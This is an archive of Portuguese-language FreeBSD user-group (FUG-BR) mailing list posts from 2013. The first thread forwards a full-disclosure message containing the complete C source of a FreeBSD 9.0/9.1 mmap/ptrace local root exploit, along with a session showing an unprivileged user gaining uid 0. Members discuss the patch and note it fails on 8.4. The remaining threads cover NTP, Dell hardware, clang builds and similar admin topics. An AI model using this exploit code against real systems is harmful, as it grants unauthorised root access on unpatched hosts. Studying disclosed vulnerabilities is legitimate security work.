Re: [FUG-BR] Fwd: Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
Em 24/06/13 18:44, firebits escreveu:
Marcelo Gondim, cita para nós qual é a lista de security, que fez essa
afirmação, fiquei curioso...rss
@firebitsbr
Emiel Kollof que mandou pra bugt...@securityfocus.com:)
Em 20 de junho de 2013 17:38, Marcelo Gondim gon...@bsdinfo.com.brescreveu:
Em 20/06/13 15:42, Evandro Nunes escreveu:
On Thu, Jun 20, 2013 at 9:29 AM, Marcelo Gondim gon...@bsdinfo.com.br
wrote:
É pessoal,
Sei que a vulnerabilidade foi corrigida agora mas foram 20 anos para
detectar isso? :(
E funciona lindo mesmo o programa.
de onde saiu isso que tem 20 anos? pelo pouco que deu pra ler explora uma
falha do freebsd 9 inclusive o security adv so explora o freebsd 9
alguem teve sucesso com freebsd 8, 7, outro?
acho que a frase seguranca de 20 anos atras foi apenas ironiazinha
pelo que vi esse vulnerabilidade nao afeta quem tem debug de processo nao
root nem quem tem mac_partition ou bsdextended implementado
nego quer é aparecer rss rsss a falha tai, mas não teve 0day inclusive o
ultra mega hacker expert só fez o exploit depois que o advisory foi
publicado, e ainda levou 2 dias pra conseguir explorar o que ja estava
documentado e corrigido e vem tirar uma onda de full disclosure...
Pois é recebi isso em uma lista de segurança que assino. Consegui um 8.4
e testei e não rola. Só no 9 mesmo.
Esses caras são uns paiaços mesmo rsrsrsrsrs
Mensagem original
Assunto:Happy Birthday FreeBSD! Now you are 20 years old and
your
security is the same as 20 years ago... :)
Data: Wed, 19 Jun 2013 23:32:59 +0200
De: Hunger hun...@hunger.hu
Para: full-disclos...@lists.grok.org.uk
$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger fbsd9...@hunger.hu
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#
code =
/*
* FreeBSD 9.{0,1} mmap/ptrace exploit
* by Hungerfbsd9...@hunger.hu
*
* Happy Birthday FreeBSD!
* Now you are 20 years old and your security is the same as 20 years
ago...
*
* Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op,
pipacs,
prof,
* sd, sghctoma, snq, spender, s2crew and others at
#hekkcamp:
* I hope we'll meet again at 8@1470n
*
* Special thanks to proactivesec.com
*
*/
#include err.h
#include errno.h
#include unistd.h
#include stdio.h
#include stdlib.h
#include string.h
#include fcntl.h
#include sys/stat.h
#include sys/mman.h
#include sys/types.h
#include sys/ptrace.h
#include sys/wait.h
#define SH /bin/sh
#define TG /usr/sbin/timedc
int
main(int ac, char **av) {
int from_fd, to_fd, status;
struct stat st;
struct ptrace_io_desc piod;
char *s, *d;
pid_t pid;
if (geteuid() == 0) {
setuid(0);
execl(SH, SH, NULL);
return 0;
}
printf(FreeBSD 9.{0,1} mmap/ptrace exploit\n);
printf(by Hungerfbsd9...@hunger.hu\n);
if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
(to_fd = open(TG, O_RDONLY)) == -1)
err(1, open);
if (stat(av[0], st) == -1)
err(2, stat);
if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
(d = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) ==
MAP_FAILED)
err(3, mmap);
if ((pid = fork()) == -1)
err(4, fork);
if (!pid) {
if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
err(5, ptraceme);
return 0;
}
if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
err(6, ptattach);
if (wait(status) == -1)
err(7, wait);
piod.piod_op = PIOD_WRITE_D;
piod.piod_offs = d;
piod.piod_addr = s;
piod.piod_len = st.st_size;
if (ptrace(PT_IO, pid, (caddr_t)piod, 0) == -1)
err(8, ptio);
execl(TG, TG, NULL);
return 0;
}
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
[FUG-BR] NTP
Senhores, Estou utilizando o ntpdate em um 8.4-STABLE e me deparei com uma situação muito estranha, o servidor consulta o ntp e mostra o sincronimos porém não aplica a mesma no sistema. a conf está da seguinte forma: rc.conf ntpdate_enable=YES ntpdate_flags=-b -u -4 ntpdate_hosts=a.ntp.br ntp.cais.rnp.br No boot da máquina, como eu falei, ele sincroniza corretamente, porém não aplica. Depois de logar com o root e rodar o ntpdate a.ntp.br ele simplesmente sincroniza. obrigado, - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] NTP
Coloca no cron: service ntpdate restart no horário que você achar conveniente, utilizo isso para sincronização sem a necessidade de rodar mais um deamon que poderia ser explorado em uma falha de segurança futura. Isso é válido onde o horário não é crítico. Paulo. Em 25/06/13 10:24, Márcio Luciano Donada escreveu: Senhores, Estou utilizando o ntpdate em um 8.4-STABLE e me deparei com uma situação muito estranha, o servidor consulta o ntp e mostra o sincronimos porém não aplica a mesma no sistema. a conf está da seguinte forma: rc.conf ntpdate_enable=YES ntpdate_flags=-b -u -4 ntpdate_hosts=a.ntp.br ntp.cais.rnp.br No boot da máquina, como eu falei, ele sincroniza corretamente, porém não aplica. Depois de logar com o root e rodar o ntpdate a.ntp.br ele simplesmente sincroniza. obrigado, - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] NTP
Em 25 de junho de 2013 10:33, Paulo Fragoso pa...@nlink.com.br escreveu: Coloca no cron: service ntpdate restart no horário que você achar conveniente, utilizo isso para sincronização sem a necessidade de rodar mais um deamon que poderia ser explorado em uma falha de segurança futura. Isso é válido onde o horário não é crítico. Paulo. Em 25/06/13 10:24, Márcio Luciano Donada escreveu: Senhores, Estou utilizando o ntpdate em um 8.4-STABLE e me deparei com uma situação muito estranha, o servidor consulta o ntp e mostra o sincronimos porém não aplica a mesma no sistema. a conf está da seguinte forma: rc.conf ntpdate_enable=YES ntpdate_flags=-b -u -4 ntpdate_hosts=a.ntp.br ntp.cais.rnp.br No boot da máquina, como eu falei, ele sincroniza corretamente, porém não aplica. Depois de logar com o root e rodar o ntpdate a.ntp.br ele simplesmente sincroniza. obrigado, - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd pelo que me lembro, service ntpdate restart esta comando do linux. sptizer# cat /etc/rc.conf | grep ntp ntpd_enable=YES sptizer# /etc/rc.d/ntpd restart Stopping ntpd. Starting ntpd. -- Alessandro de Souza Rocha Administrador de Redes e Sistemas FreeBSD-BR User #117 Long live FreeBSD Powered by (__) \\\'',) \/ \ ^ .\._/_) www.FreeBSD.org - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] [Off-Topic] - Compatibilidade do Freebsd em Servidores Dell PowerEdge
Ola lista ! O pessoal da lista tem usado o FreeBSD sem grandes problemas em servidores Dell PowerEdge ? Estou enfrentando alguns problemas com um R720, a controladora de rede BCM5720 insiste em dar watchdog timeout -- resetting error, estou usando o FreeBSD 9.1, compilei alguns drivers do fabricante para Freebsd, mas ainda sem efeito :-(. Estou tentando recompilar o kernel para a versão stable e ver se o problema some, não estou com muita esperança que isso resolva ... Uma outra duvida, alguém usa HBA QLogic 2560 no FreeBSD 9.1 ? Agradeço se alguém tiver dicas ! Eder - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [OFF-TOPIC]Como ter garantia de ser respondido sobre dúvidas de BSD?
também estou precisando de dinheiro, ficarei feliz em te cobrar, pois já não é a primeira vez que você faz essa pergunta... pra quem devo pagar, etc e tal... Em 23 de junho de 2013 18:38, Renato Botelho rbga...@gmail.com escreveu: On 06/22/2013 11:38 AM, Jorge Luis Carvalho Santos wrote: Eric Raimond diz no guia Como fazer perguntas inteligentes, no título Antes de perguntar, Nunca assuma que você merece uma resposta. Você não merece; você não está, afinal de contas, pagando por este serviço. Você irá ganhar uma resposta, se ganhar, fazendo perguntas substanciais, interessantes e intrigantes - uma que contribua com a experiência da comunidade ao invés de apenas extrair conhecimentos dos outros. Se o usuário não ganhar a resposta ou se as comunidades de BSD, por exemplo, a lista e o fórum FUG-BR estiverem paradas, a quem se deve pagar para ter garantia de ser respondido sobre dúvida de BSD? Para mim será frustrante fazer o FreeBSD Server e System Administration da FreeBSD Brasil se depois de fazer esse curso não ganhar resposta de comunidade BSD ou se as comunidades de BSD estiverem paradas, pois não sei inglês para ser ajudado pela freebsd.org. Pague pra mim e eu te respondo. -- Renato Botelho - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- Att. Tiago N. Furbeta Cangere Online Provedor de Internet Ltda. Empresa de Telecomunicações Autorizada SCM/ANATEL tfurb...@cangere.com.br - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] Orbis OS
Já rolou por aqui? Bem, não chequei no histórico, pois mesmo que tenha rolado acho que merece repeteco! http://br-linux.org/2013/01/orbis-os-o-sistema-operacional-do-playstation-4-e-mesmo-um-derivado-do-freebsd.html Carlos E G Carvalho (Cartola) http://cartola.org/360 http://www.panoforum.com.br/ - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] Intel ixgbe + ALTQ
Pessoal, No HEAD já é possível usar ALTQ novamente com as placas ixgbe. E de quebra a Intel representada pelo desenvolvedor jfv@, sincronizou o código na Intel com o da base do FreeBSD, agora temos a última versão com quase as mesmas funções que em outros sistemas operacionais. Tenho apenas que dizer, o jfv@ é foda Ref: http://svnweb.freebsd.org/base?view=revisionrevision=251964 Abraços. -- Marcelo Araujo ara...@freebsd.org - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] Local correto para selecionar o compilador
Olá pessoal, Estou com dois problemas, que andei procurando pelo handbook e pela net e não achei uma solução que me convença. Quero apenas utilizar para a compilação do meus sistema (FONTES/KERNEL) o compilador clang. Fui até o make.conf e puz o seguinte: WITHOUT_GCC=YES CC=clang mas não funcionou, ele ainda chama o gcc para compilar. Existe uma outra opção ou no 9.1 não posso utilizar apenas o clang? uma outra coisa é que estou tento problemas para compilar os fontes como segue: llvm/lib/Support/system_error.cpp c++ -O2 -pipe - I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/include - I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/tools/clang/include - I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/lib/Support -I. - I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/../../lib/clang/inclu de -DLLVM_ON_UNIX -DLLVM_ON_FREEBSD -D__STDC_LIMIT_MACROS - D__STDC_CONSTANT_MACROS -fno-strict-aliasing - DLLVM_DEFAULT_TARGET_TRIPLE=\x86_64-unknown-freebsd9.1\ - DLLVM_HOSTTRIPLE=\x86_64-unknown-freebsd9.1\ -DDEFAULT_SYSROOT=\\ - I/usr/obj/usr/src/tmp/legacy/usr/include -fno-exceptions -fno-rtti -c /usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/lib/Support/APFloat.cp p -o APFloat.o /usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/lib/Support/APFloat.cp p:1: internal compiler error: Segmentation fault: 11 Please submit a full bug report, with preprocessed source if appropriate. See URL:http://gcc.gnu.org/bugs.html for instructions. *** [APFloat.o] Error code 1 Stop in /usr/src/lib/clang/libllvmsupport. *** [bootstrap-tools] Error code 1 Stop in /usr/src. *** [_bootstrap-tools] Error code 1 e é sempre nesse arquivo. Já eixei meu computador 24horas rodando o memtest86 e nada de anormal. O mais extranho é que no meu laptop e em mais dois outros roda redondo. Segue infos do meu sistema: FreeBSD valfenda 9.1-STABLE FreeBSD 9.1-STABLE #3 r251021: Mon May 27 05:29:03 BRT 2013 rizzo@valfenda:/usr/obj/usr/cvsup/src/sys/VALFENDA amd64 CPU: AMD Athlon(tm) 64 X2 Dual Core Processor 4400+ (2300.14-MHz K8-class CPU) FreeBSD/SMP: Multiprocessor System Detected: 2 CPUs cpu0: ACPI CPU on acpi0 cpu1: ACPI CPU on acpi0 amdtemp0: AMD CPU On-Die Thermal Sensors on hostb4 acpi_throttle0: ACPI CPU Throttling on cpu0 SMP: AP CPU #1 Launched! real memory = 4294967296 (4096 MB) avail memory = 3973017600 (3788 MB) - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Local correto para selecionar o compilador
* Nilton Jose Rizzo (ri...@i805.com.br) wrote: Olá pessoal, Estou com dois problemas, que andei procurando pelo handbook e pela net e não achei uma solução que me convença. Quero apenas utilizar para a compilação do meus sistema (FONTES/KERNEL) o compilador clang. Fui até o make.conf e puz o seguinte: WITHOUT_GCC=YES CC=clang mas não funcionou, ele ainda chama o gcc para compilar. Existe uma outra opção ou no 9.1 não posso utilizar apenas o clang? uma outra coisa é que estou tento problemas para compilar os fontes como segue: llvm/lib/Support/system_error.cpp c++ -O2 -pipe - I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/include - I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/tools/clang/include - I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/lib/Support -I. - I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/../../lib/clang/inclu de -DLLVM_ON_UNIX -DLLVM_ON_FREEBSD -D__STDC_LIMIT_MACROS - D__STDC_CONSTANT_MACROS -fno-strict-aliasing - DLLVM_DEFAULT_TARGET_TRIPLE=\x86_64-unknown-freebsd9.1\ - DLLVM_HOSTTRIPLE=\x86_64-unknown-freebsd9.1\ -DDEFAULT_SYSROOT=\\ - I/usr/obj/usr/src/tmp/legacy/usr/include -fno-exceptions -fno-rtti -c /usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/lib/Support/APFloat.cp p -o APFloat.o /usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/lib/Support/APFloat.cp p:1: internal compiler error: Segmentation fault: 11 Please submit a full bug report, with preprocessed source if appropriate. See URL:http://gcc.gnu.org/bugs.html for instructions. *** [APFloat.o] Error code 1 Stop in /usr/src/lib/clang/libllvmsupport. *** [bootstrap-tools] Error code 1 Stop in /usr/src. *** [_bootstrap-tools] Error code 1 e é sempre nesse arquivo. Já eixei meu computador 24horas rodando o memtest86 e nada de anormal. O mais extranho é que no meu laptop e em mais dois outros roda redondo. Segue infos do meu sistema: FreeBSD valfenda 9.1-STABLE FreeBSD 9.1-STABLE #3 r251021: Mon May 27 05:29:03 BRT 2013 rizzo@valfenda:/usr/obj/usr/cvsup/src/sys/VALFENDA amd64 CPU: AMD Athlon(tm) 64 X2 Dual Core Processor 4400+ (2300.14-MHz K8-class CPU) FreeBSD/SMP: Multiprocessor System Detected: 2 CPUs cpu0: ACPI CPU on acpi0 cpu1: ACPI CPU on acpi0 amdtemp0: AMD CPU On-Die Thermal Sensors on hostb4 acpi_throttle0: ACPI CPU Throttling on cpu0 SMP: AP CPU #1 Launched! real memory = 4294967296 (4096 MB) avail memory = 3973017600 (3788 MB) Você esta tentando compilar o clang ? no 9.x ele já vem nativo (/usr/bin/clang) para compilar ports e world com clang, coloque no /etc/make.conf: CC=clang CXX=clang++ CPP=clang-cpp Segue algumas referencias: https://wiki.freebsd.org/BuildingFreeBSDWithClang https://wiki.freebsd.org/PortsAndClang Abraços --- Luiz Gustavo Costa (Powered by BSD) *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+ mundoUnix - Consultoria em Software Livre http://www.mundounix.com.br ICQ: 2890831 / MSN: cont...@mundounix.com.br Tel: 55 (21) 4063-7110 / 8194-1905 / (11) 4063-0407 Blog: http://www.luizgustavo.pro.br - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
